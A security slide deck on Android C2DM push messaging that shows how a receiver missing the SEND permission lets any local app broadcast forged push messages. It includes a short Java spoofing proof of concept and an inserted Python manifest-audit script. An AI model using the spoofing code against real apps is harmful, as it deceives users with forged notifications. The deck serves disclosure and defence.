AC2DM
for Security
Android C2DM Overview
• Push notification for Android
• Rides on Gtalk (XMPP)
• Messages limited to 1024 bytes
• Account limited to 200,000 messages per day
A confusing process
Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
Client Registration
App Registration
Message Send
Parts of a Message
Required
• Registration ID – sent by client
• Collapse key – used to avoid flooding
• Auth token – header from client login auth
Optional
• Data - payload
• Delay while idle - flag
Manifest Components
<permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE"
    android:protectionLevel="signature" />
<!-- Required to receive C2D messages -->
<uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" />
<!-- Required to register and receive registration results -->
<uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />
<!-- Internet required -->
<uses-permission android:name="android.permission.INTERNET" />
<application>
    <!-- Android C2DM registration receiver -->
    <receiver android:name=".c2dRegReceiver" android:permission="com.google.android.c2dm.permission.SEND">
        <intent-filter>
            <action android:name="com.google.android.c2dm.intent.REGISTRATION"></action>
            <category android:name="com.intrepidusgroup.c2dm" />
        </intent-filter>
    </receiver>
    <!-- Android C2DM message receiver -->
    <receiver android:name=".c2dMsgReceiver" android:permission="com.google.android.c2dm.permission.SEND">
        <intent-filter>
            <action android:name="com.google.android.c2dm.intent.RECEIVE"></action>
            <category android:name="com.intrepidusgroup.c2dm" />
        </intent-filter>
    </receiver>
</application>
Real World
<permission
android:name="com.app.mobile.permission.C2D_MESSAGE"
android:protectionLevel="signature" />
<uses-permission
android:name="com.app.mobile.permission.C2D_MESSAGE" />
So far so good…
Real World
<receiver android:name=".notifications.PushMsgReceiver"
android:process=":notifications">
<intent-filter>
<action
android:name="com.google.android.c2dm.intent.RECEIVE" />
<category android:name="com.ebay.mobile" />
</intent-filter>
<intent-filter>
<action
android:name="com.google.android.c2dm.intent.REGISTRATION" />
<category android:name="com.ebay.mobile" />
</intent-filter>
</receiver>
<!-- Only C2DM servers can send messages for the app.
If permission is not set - any other app can generate it -->
<receiver android:name=".C2DMReceiver"
android:permission="com.google.android.c2dm.permission.SEND">
So…
ZOMG!!
Example Push (seen in logcat)
I/PushService( 3990): onHandleIntent:
action=3, intent data=Bundle[{
itm=37524594341,
push_action=3,
title=message received from: jross,
collapse_key=jrossig01,
sound=m2mmsghdr.caf,
evt=M2MMSGHDR,
from=appid@gmail.com,
usr=jross
}]
Spoof (no cloud required)
// declare the Intent
final Intent sendC2DM = new Intent
("com.google.android.c2dm.intent.RECEIVE");
// set this as category com.app.mobile to match the intent-filter
sendC2DM.addCategory("com.app.mobile");
// add the expected data elements
sendC2DM.putExtra("itm", "37524594341");
sendC2DM.putExtra("push_action", "3");
sendC2DM.putExtra("title", "message recieved from: C2DSpoofer");
sendC2DM.putExtra("sound", "m2mmsghdr.caf");
sendC2DM.putExtra("evt", "M2MMSGHDR");
sendC2DM.putExtra("usr", send2usr);
String collapse_key = randString.genString(rng, chars, 4);
sendC2DM.putExtra("collapse_key", collapse_key);
// send the message to the on-device push notification receiver
sendBroadcast(sendC2DM);
What Happened?
• App received a “C2D” message from
another application installed on the
device.
• Because the permission wasn’t set
correctly, it accepted the message as
though it came from Google.
• App displayed message notification, with
the “malicious” payload intact.
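A manifest check for the misconfiguration described above, as an added example that is not part of the original slides: it flags any receiver that handles the C2DM actions without requiring com.google.android.c2dm.permission.SEND. The sample manifests are constructed from the receiver declarations shown in the slides; the package name com.example.app and the function name audit_manifest are assumptions.

```python
"""Flag C2DM receivers in an AndroidManifest.xml that any local app can broadcast to."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # namespace of android: attributes
C2DM_ACTIONS = {
    "com.google.android.c2dm.intent.RECEIVE",
    "com.google.android.c2dm.intent.REGISTRATION",
}
SEND_PERMISSION = "com.google.android.c2dm.permission.SEND"


def audit_manifest(xml_text):
    """Return a list of (component_name, problem) tuples; an empty list means no findings."""
    root = ET.fromstring(xml_text)
    findings = []

    # The app's own C2D_MESSAGE permission must be signature-level so that
    # no other package can hold it (an omitted protectionLevel means "normal").
    for perm in root.iter("permission"):
        name = perm.get(A + "name", "")
        level = perm.get(A + "protectionLevel", "normal")
        if name.endswith(".permission.C2D_MESSAGE") and level != "signature":
            findings.append((name, "protectionLevel is %s, expected signature" % level))

    # Every receiver that accepts a C2DM action must require the SEND permission
    # from the broadcaster; otherwise any installed app can deliver the intent.
    for receiver in root.iter("receiver"):
        actions = {
            action.get(A + "name")
            for intent_filter in receiver.findall("intent-filter")
            for action in intent_filter.findall("action")
        }
        handled = sorted(actions & C2DM_ACTIONS)
        if not handled:
            continue
        name = receiver.get(A + "name")
        required = receiver.get(A + "permission")
        if required is None:
            findings.append(
                (name, "no android:permission; any app can broadcast " + ", ".join(handled))
            )
        elif required != SEND_PERMISSION:
            findings.append(
                (name, "android:permission is %s, expected %s" % (required, SEND_PERMISSION))
            )
    return findings


# Constructed sample input: the receiver from the "Real World" slide, wrapped in a
# minimal manifest with an assumed package name. %s is where android:permission goes.
_TEMPLATE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <permission android:name="com.example.app.permission.C2D_MESSAGE"
      android:protectionLevel="signature" />
  <application>
    <receiver android:name=".notifications.PushMsgReceiver"%s>
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.RECEIVE" />
        <category android:name="com.example.app" />
      </intent-filter>
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
        <category android:name="com.example.app" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""
VULNERABLE_MANIFEST = _TEMPLATE % ""
HARDENED_MANIFEST = _TEMPLATE % (' android:permission="%s"' % SEND_PERMISSION)

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        print(label, audit_manifest(text) or "no findings")
```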
Other Things We’ve Noticed
• Messages that come in may not be
accurately received by the activity
they are sent to (see: demo).
• If you have multiple devices, or multiple
users on a single device, things may get
tricky.
Questions?
Contact:
jason.ross@intrepidusgroup.com


Editor's Notes

  1. • registration_id = The registration ID retrieved from the Android application on the phone. Required.
     • collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required.
     • data.<key> = Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional.
     • delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional.
     • Authorization = GoogleLogin auth=[AUTH_TOKEN]. Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
  2. (1) This requires that the application signature be present when the permission is used.
     (2) This restricts the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” portion is missing, anyone can push messages of this type (registration results) to the application.
     (3) Same as #2, but for the actual C2D messages.